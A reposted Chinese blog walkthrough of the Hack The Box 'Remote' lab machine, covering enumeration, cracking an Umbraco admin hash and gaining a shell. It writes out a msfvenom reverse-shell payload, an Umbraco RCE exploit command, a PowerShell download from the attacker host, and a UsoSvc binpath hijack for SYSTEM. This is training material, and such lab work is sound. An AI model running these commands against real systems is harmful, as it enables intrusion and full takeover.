首页 > 其他 > 详细

HTB-Remote

时间:2020-09-20 08:43:18      阅读:58      评论:0      收藏:0      [点我收藏+]

最近域名到期了,注册要好几天,就在这发个水文得了..

nmap -sC -sV -A 10.10.10.180

技术分享图片
ftp
anonymous登陆,但是没东西
技术分享图片

smb

smbclient -L 10.10.10.180

-L查看共享资源,但是需要登陆
技术分享图片

rpc nfs共享

showmount -e 10.10.10.180

技术分享图片
发现共享目录,把他挂到本地

mount 10.10.10.180:/site_backups ./share

技术分享图片
主要看一下Web.config,找跟数据库有关的
但是只能本地连接
技术分享图片
找到连接的配置文件Umbraco.sdf
技术分享图片
find一下路径,strings查找,可以得到用户名和hash1加密的密码
技术分享图片
用hashcat爆破 -m 100表示hash1
技术分享图片
拿去登陆,来到后台,发现版本为7.12.4,有现成exp
技术分享图片
选择弹个shell回来,可以上传文件,msfvenom生成一个exe上传
技术分享图片

msfvenom -p windows/meterpreter_reverse_tcp lhost=10.10.14.26 lport=1234 -f exe -o shell.exe

上传后用exp执行

python3 exp.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a ‘C:/inetpub/wwwroot/Media/1033/shell.exe‘

之后需要提权,可以用提权辅助工具
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

kali开个http

powershell.exe -command "(new-object Net.WebClient).DownloadFile(‘http://10.10.14.26:1235/PowerUp.ps1‘,‘C:\Users\Public\PowerUp.ps1‘)"

然后进入powershell

import-module ./powerup.ps1
./powerup.ps1

技术分享图片
也可以查看启动的服务

wmic service where started=true get name, startname

可以看到usosvc是localsystem技术分享图片
sc stop usosvc发现可以控制
技术分享图片
那就直接设置binpath为反弹shell路径

sc usosvc stop
sc config usosvc binpath="C:\Users\Public\re.exe"
sc usosvc start

getroot
技术分享图片

HTB-Remote

原文:https://www.cnblogs.com/W4nder/p/13698688.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!